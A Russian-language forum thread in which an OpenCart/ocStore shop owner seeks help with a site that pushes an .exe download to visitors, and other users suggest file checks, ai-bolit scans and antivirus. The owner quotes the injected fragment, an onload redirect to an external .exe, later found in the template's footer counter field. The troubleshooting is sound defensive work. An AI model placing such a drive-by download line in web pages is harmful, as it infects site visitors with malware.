Вирус закачивается на компьютер при открытии сайта

[borborich]

ocstore 2.3.0.2.3 
newstore

При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart. 
обращение в поддержку хостинга особо не помогло.
Где копать?

[esculapra]

  В 09.10.2022 в 06:27, borborich сказав:

Где копать?

Expand  

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. 

Известно ли, как называется вредоносный exe?

Змінено 9 жовтня 2022 користувачем esculapra

[buslikdrev]

  В 09.10.2022 в 06:27, borborich сказав:

ocstore 2.3.0.2.3 
newstore

При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart. 
обращение в поддержку хостинга особо не помогло.
Где копать?

Expand  

 

https://opencartforum.com/files/file/8788-chistka-saytov-i-serverov-ot-virusov/

[borborich]

  В 09.10.2022 в 06:47, esculapra сказав:

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. 

Известно ли, как называется вредоносный exe?

Expand  

 

Делал откат на месяц назад, тогда этой проблемы не было, но не помогло.
Файл называется прайслист.exe качается с другого сервера.

[esculapra]

  В 10.10.2022 в 06:37, borborich сказав:

Делал откат на месяц назад

Expand  

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

[borborich]

  В 10.10.2022 в 07:21, esculapra сказав:

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Expand  

Спасибо, сейчас буду делать

 

[borborich]

  В 10.10.2022 в 07:21, esculapra сказав:

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Expand  

 

ai-bolt что то пропустил все файлы

[SSHEVA]

  В 10.10.2022 в 10:00, borborich сказав:

 

ai-bolt что то пропустил все файлы

Expand  

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

Змінено 10 жовтня 2022 користувачем SSHEVA

[borborich]

  В 10.10.2022 в 10:12, SSHEVA сказав:

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

Expand  

 

каким антивирусом пользовались?

[SSHEVA]

  В 10.10.2022 в 11:16, borborich сказав:

 

каким антивирусом пользовались?

Expand  

ESET SMART SECURITY PREMIUM

[esculapra]

  В 10.10.2022 в 10:12, SSHEVA сказав:

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК

Expand  

Я еще не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найдет. Айболит должен был найти, но видимо там нет явного кода. Можно попробовать параноидальный режим. Хотя, если это в картинках то может не найти - проще посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки также могут подключаться через стили, но тут откат бы все исправил.

Змінено 10 жовтня 2022 користувачем esculapra

[borborich]

ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать.

[SSHEVA]

  В 10.10.2022 в 13:44, borborich сказав:

ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать.

Expand  

После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще  Поиск использовать в редакторе.

[borborich]

  В 10.10.2022 в 13:54, SSHEVA сказав:

После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще  Поиск использовать в редакторе.

Expand  

спасибо, собственно для этого и скачиваю

[borborich]

Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль результатов

[SSHEVA]

  В 11.10.2022 в 09:18, borborich сказав:

Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль результатов

Expand  

Тогда нужно смотреть уже сайт, так вслепую сложно сказать

[borborich]

Нашелся в конфигах подвала newstore, теперь бы понять как он туда попал и как этого избежать
@29aleksey есть предположения?
 

[29aleksey]

В настройки шаблона в поле код счетчика прописывается только с админки 

[borborich]

  В 11.10.2022 в 18:38, 29aleksey сказав:

В настройки шаблона в поле код счетчика прописывается только с админки 

Expand  

 

подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда

[Ecolotos]

  В 12.10.2022 в 12:48, borborich сказав:

 

подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда

Expand  

Звучит это все как фантастика